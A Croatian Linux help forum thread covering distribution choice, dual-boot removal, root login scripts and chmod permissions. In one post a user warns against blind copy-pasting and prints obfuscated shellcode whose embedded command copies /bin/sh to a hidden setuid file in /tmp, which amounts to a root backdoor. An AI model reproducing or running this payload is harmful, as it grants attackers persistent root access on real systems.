Linux - pitanja i odgovori izdvojena tema

poruka: 20.145
|
čitano: 3.508.077
|
moderatori: pirat, Lazarus Long, XXX-Man, vincimus
+/- sve poruke
ravni prikaz
starije poruke gore
13 godina
neaktivan
Re: Linux - pitanja i odgovori
mario.L_hr kaže...
Master11 kaže...

Vidiš, nisam spojen na AP od Vip-a, nego sam spojen na svoj mobitel Nokia 5800XM preko USB-a, ali probati ću...
EDIT: Neće, jebe ga modem od mobitela, pogledaj onu sliku sa terminala pa pročitaj kaj piše...

Imaš li ti uopće vezu s Internetom?

Hahahaha; naravno da imam; Vip HomeBox od 5GB, ali sada sam si aktivirao na mobitelu opciju Instant Internet dan gdje imaš 24 h da potrošiš 20GB, uglavnom platiš 10 kn, i onda napravim sve update-ove i pogledam si neke serije, jer kad predem 5GB na HomeBox-u, onda mi je cijena po 1GB 15 kn...
Razumijes sada?! 
EDIT: Pa ima; evo sada gledam filmove, Youtube, normalno surfam preko Chrome-a...
Samo zajebava kod update-a... 

Poruka je uređivana zadnji put sri 20.3.2013 0:17 (Master11).
14 godina
Master11 kaže...

Hahahaha; naravno da imam; Vip HomeBox od 5GB, ali sada sam si aktivirao na mobitelu opciju Instant Internet dan gdje imaš 24 h da potrošiš 20GB, uglavnom platiš 10 kn, i onda napravim sve update-ove i pogledam si neke serije, jer kad predem 5GB na HomeBox-u, onda mi je cijena po 1GB 15 kn...
Razumijes sada?! 

Mislio sam da li Linux računalo ima vezu s internetom jer mi nalikuje tome da se nemožeš spojiti na server.

Stručnjak za odmaganje...
13 godina
neaktivan
Linux - pitanja i odgovori

Mislio sam si instalirati uz windowse i neku distibuciju linuxa, pa me zanima, koja je po vama, vizualno najljepša distribucija, ja sam dosad isprobao samo Ubuntu

Moj PC  
0 0 hvala 0
12 godina
neaktivan

Vizualno najljepša distribucija nije ni jedna. Korisnička sučelja već da.

Tu sad imaš KDE koje je tehnički najnaprednije sučelje no nije za stari hardveraj.

Imaš gnome, xfce i lxde te hrpu windows managera.

Unity je samo shell za gnome3. Probaj opensuse 12.3

4 0 hvala 1
17 godina
neaktivan

Gdje trebam staviti .sh datoteku da se bash skripta pokrene svaki puta kada se root logina ?

Trust Me, I'm an Engineer :)
Moj PC  
0 0 hvala 0
13 godina

Instalirao sam Mint 14 (Cinnamon, 32bit) putem USB-a alongside Win 7 na zasebnu particiju (formiranu u sedmici) te sam nešto zmrdao u root modeu jer sam njub pa mi ne želi dignuti Mint više {#}

Mogu li kako maknuti Mint (da bih ga mogao reinstalirati) u Windowsima putem Disk Managementa? Hoće li to obrisati i Grub boot loader te mi vratiti boot na Win 7 ili neće?

Nažalost nemam instalacijski DVD za Windows jer imam predinstaliranu OEM verziju. Čitam po internetu da je to potrebno zbog toga jer se poremeti Windowsov boot loader pa treba pokrenuti "Repair your computer".

Druga i treća odozgo su linuxove particije.

0100011001000001010100000010000000110100001000000100110001001001010001100100010100100001
Poruka je uređivana zadnji put pet 22.3.2013 23:47 (pr0n_addict).
Moj PC  
0 0 hvala 0
14 godina
pr0n_addict kaže...

Instalirao sam Mint 14 (Cinnamon, 32bit) putem USB-a alongside Win 7 na zasebnu particiju (formiranu u sedmici) te sam nešto zmrdao u root modeu jer sam njub pa mi ne želi dignuti Mint više {#}

Mogu li kako maknuti Mint (da bih ga mogao reinstalirati) u Windowsima putem Disk Managementa? Hoće li to obrisati i Grub boot loader te mi vratiti boot na Win 7 ili neće?

Grub makneš na način da napraviš repair MBR-a (koristeći instalacijski disk od 7-ce). Mint ne trebaš micati samo formatiraš particiju na kojoj se nalazi i gotova stvar.

15 godina
neaktivan

Gdje trebam staviti .sh datoteku da se bash skripta pokrene svaki puta kada se root logina ?

Staviš gdje god hoćeš, ali najbolje je pod /root, a za izvođenje uneseš path unutar .bash_profile

Poruka je uređivana zadnji put pet 22.3.2013 23:47 (takozvani).
16 godina
pr0n_addict kaže...

U Disk Managementu formatiraj particije koje Windows ne prepoznaje (za njih imaš samo opcju ''Delete'').

Grub ti je sigurno na boot particiji ,tak da njega sigurno nećeš obrisati.

If it ain't broken, you're not working hard enough ...
12 godina
neaktivan
takozvani kaže...

Staviš gdje god hoćeš, ali najbolje je pod /root, a za izvođenje uneseš path unutar .bash_profile

What?!! Pobogu zašto?

Staviš je u /home, chmodaš i uneseš u .xinitrc, nikakav /.

To je nesigurno.

17 godina
neaktivan
takozvani kaže...

invoking kaže...
takozvani kaže...

What?!! Pobogu zašto?

To je nesigurno.

Jel bi mogao urediti nekako /root/.bashrc da pointa/pokazuje na skriptu koju zelim pokrenuti ? 

EDIT: rijeseno :)
Ubacio putanje do skripte u /root/.bashrc datoteki, mislim da je tako najsigurnije i najfleksibilinje(?), ako se zeli ugasiti samo maknem jednu liniju, a .bashrc  tako i tako samo root moze uredivati !

Trust Me, I'm an Engineer :)
Poruka je uređivana zadnji put sub 23.3.2013 11:04 (benko).
14 godina
neaktivan

opet jedno novo pitanje...

imam instaliran linux mint 13 i zanima me kako napraviti hotspot tako da se mogu

s mobom spojiti na internet od laptopa,znaci  nesto poput connectify-a za winse.

probo sam kao onaj ad-hoc al to mi nes nije uspjelo,pa eto pomagajte :D

Moj PC  
0 0 hvala 0
15 godina

Sta mi je činiti? Nemogu ništa instalirati.

Bolje ispasti GLUP, nego iz autobusa.
14 godina
x18x05x kaže...

Probaj ovo.

15 godina
mario.L_hr kaže...
x18x05x kaže...

Probaj ovo.

Nisam uspio. Skinut cu si Open Suse.

Bolje ispasti GLUP, nego iz autobusa.
13 godina
kizo2703 kaže...
pr0n_addict kaže...

U Disk Managementu formatiraj particije koje Windows ne prepoznaje (za njih imaš samo opcju ''Delete'').

Grub ti je sigurno na boot particiji ,tak da njega sigurno nećeš obrisati.

Riješio sam problem reinstalacijom Mint-a kroz njegov installer - on sve fino formatira pa nove fajlove kopira.

Sada sve radi kako treba.

0100011001000001010100000010000000110100001000000100110001001001010001100100010100100001
14 godina
neaktivan

Koju verziju da skinem odavde?

http://www.linuxmint.com/release.php?id=19

http://www.bug.hr/forum/topic/softver-literatura-usluge/prodaja-knjige-hardware/103166.aspx

0 0 hvala 0
13 godina
neaktivan
Intelovac123 kaže...

Tu ti je Domagoj pokazao neka od sučelja, vidi i na Googleu koje ti se najviše dopada pa tu skini.

14 godina
neaktivan
royalhero kaže...
Intelovac123 kaže...

Tu ti je Domagoj pokazao neka od sučelja, vidi i na Googleu koje ti se najviše dopada pa tu skini.

Pa koja je onvako najbolja.

Ne znam bas puno o linuxu :D

http://www.bug.hr/forum/topic/softver-literatura-usluge/prodaja-knjige-hardware/103166.aspx
15 godina
neaktivan
Intelovac123 kaže...
royalhero kaže...
Intelovac123 kaže...

Pa pogledaj koji video za cinnamon, kde, mate, etc. na yt ako ne želiš probavati...

Wake up, Neo. Let me show you how deep the rabitt hole goes.
15 godina

Pozz ekipa, imam "problem":

Nedavno sam instalirao ubuntu na krivu particiju, velicine 400gb, na kojoj su mi sve stvari, i sad ga zelim maknut, ali je problem sta naravno windowsi nevide particije na kojoj su linuxi, pa me zanima kako da mi postane ta particija vidljiva unutar windowsa?

Hvala!

Autoclimb kills more people than AIDS
Moj PC  
1 0 hvala 0
14 godina
Svrzic kaže...

Nedavno sam instalirao ubuntu na krivu particiju, velicine 400gb, na kojoj su mi sve stvari, i sad ga zelim maknut, ali je problem sta naravno windowsi nevide particije na kojoj su linuxi, pa me zanima kako da mi postane ta particija vidljiva unutar windowsa?

Hvala!

Imaš više mogućnosti ali moja preporuka ide na dvije ili koristi Live CD Linux distribucije ili lijepo odi do Disk Menagementa (tamo se vidi particija koju ond dovedeš u red).

15 godina
mario.L_hr kaže...
Svrzic kaže...

Hvala!

Imaš više mogućnosti ali moja preporuka ide na dvije ili koristi Live CD Linux distribucije ili lijepo odi do Disk Menagementa (tamo se vidi particija koju ond dovedeš u red).

uspio sam, samo sam stavio drive letter i prepoznao je :D

Autoclimb kills more people than AIDS
15 godina
neaktivan
invoking kaže...
takozvani kaže...

What?!! Pobogu zašto?

To je nesigurno.

/home nije root user folder, već /root/.

chmod je samo način izvođenja skripte, gdje je user-u koji kreira skriptu daje odmah rwx.

.xinitrc se izvodi kod startanja X servera (desktop sučelja), a što kao ima terminal sučelje?

13 godina
neaktivan
Intelovac123 kaže...

Ne znam ni ja. :)

Pogledaj po YouTubeu i vidi šta ti se najviše sviđa. Meni je Cinnamon onako najlijepši.

12 godina
neaktivan

@takozvani

koliko vas ima znakovno korisničko sučelje? koliko vas uopće zna raditi u konzoli?

da, home nije root n korisničke skripte nemaju kaj tražiti u root folderu.

nemoj takve savjete davati ljudima? jel ti znaš uopće koristiti i administrirati linux ili si još jedan od ubuntu korisnika koji su pozobali svu pamet svjeta?

di ste bili 97  kad sam krenul koristiti slackware?

ne, chmod nije način izvođenja skripte.

chmod – modificira pristup dokumentu
su – korisnik postaje super user
chown – mijenja vlasništvo nad dokumentom
chgrp – mijenja vlasničku grupu dokumenta

Pa da ti objasnim taj chmod

Ova naredba se koristi za izmjenu dozvola datoteke ili direktorija . Za korištenje ove naredbe specificirate željenu razinu pristupa te željeni dokument kojem želite promjeniti razinu autorizacije.
Postoje dva načina kako je razina autorizacije može promjeniti no ovdje ćemo proći samo jedan.
Kako bi lakše shvatili dozvole pokušajte ih zamisliti kao serije bitova jer upravo tako ih i računalo doživljava. Evo i kako to radi:

rwx rwx rwx = 111 111 111
rw- rw- rw- = 110 110 110
rwx --- --- = 111 000 000

i tako dalje

Sad ako svaki od tri seta autorizacije prikažete kao znamenku dobivate ideju kako je razine autorizacije mogu izmjeniti. Na primjer, izmjenit ćemo razinu autorizacije našoj dobro znanoj datoteci datoteka.txt. Dakle, našoj datoteci želimo dati da samo vlasnik ima pravo čitanja i izmjene te je također želimo zaštititi od drugih korisnika. To ćemo napraviti na sljedeći način

chmod 600 datoteka.txt

Evo ti i tablica sa chmod argumentima

777 (rwxrwxrwx) Nema restrikcija, svi mogu sve.
755 (rwxr-xr-x) Vlasnik može čitati, izmjenjivati i pokretati. Ostali korisnici mogu čitati i pokrenuti.
700 (rwx------) Vlasnik može čitati, izvršiti i mijenjati. Ostali korisnici nemaju nikakva prava.
666 (rw-rw-rw-) Svi korisnici mogu samo čitati i izmjeniti.
644 (rw-r--r--) Vlasnik može čitati i izmjeniti dok svi ostali mogu samo čitati.
600 (rw-------) Korisnik može samo čitati i izmjeniti. Svi ostali korisnici nemaju nikakva prava.
Dakle, chmod nije način izvođenja skripte već je alat za modifikaciju pristupa dokumentu.
I ne korisnik nije odmah rwx jer može biti bilo koj od 6  najčešćih argumenata a to ovisi kako specificiraš modanje dokumenta.
Poruka je uređivana zadnji put ned 24.3.2013 10:23 (invoking).

0 0 hvala 0
15 godina
invoking kaže...

What?!! Pobogu zašto?

To je nesigurno.

Možeš li konkrento pojasniti zašto je nesigurno ako netko stavi skripte u / ili /root folder? I nevidim po čemu se stavljanje u /home previše razlike stavljanja u / ili /root. Meni je najlogičnije da se korisnički skripte stave u korisnički (home) folder. Mislim da je to na neki način sigurnije i od stavljanja u /, /root i /home jer ti tu ne treba pristup root računu, i ako nešto pogriješiš manja je šteta. Najbolje bi bilo napraviti poseban folder za skripte (npr. bin ili .bin) i onda ga uključiti u $PATH pomoću .bashrc i .profile.

12 godina
neaktivan

Korisničke skripte nemaju kaj tražiti u root folderu, zato imaš korisnički folder.

A sigurnost je dvosjekli mač i zajebana je na svakom sustavu pa ni Linux nije imun on sigurnosnih rupa koliko god to korisnici ne htjeli priznati a najlakši naćin njihova iskorištavanja je lakovjernost korisnika i samouvjerenost te copy/paste naredbi u terminal.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

da si staviš u skriptu.

Zašto bi to stavil u skriptu ako neznaš kaj taj kod radi a onda ga još i pokrenul?

Isto je i sa instaliranjem softvera iz neprovjerenih izvora. Netko napravi skriptu koja fino builda paket i instalira ga a na kraju ima naredbu koja prvo formatira mbr a onda cijeli disk stavlja na mull.

0 0 hvala 0
15 godina
invoking kaže...

Korisničke skripte nemaju kaj tražiti u root folderu, zato imaš korisnički folder.

Mene zanima zašto? Što se konkrentno može dogoditi ako se skripte nalaze u root folderu?

17 godina
neaktivan
Intelovac123 kaže...

Joooj, nema tu "najbolja/najlosija", tu postoji samo "svida mi se/ne svida mi se".

Perhaps today IS a good day to die. PREPARE FOR RAMMING SPEED!
E-mail:
Lozinka:

vrh stranice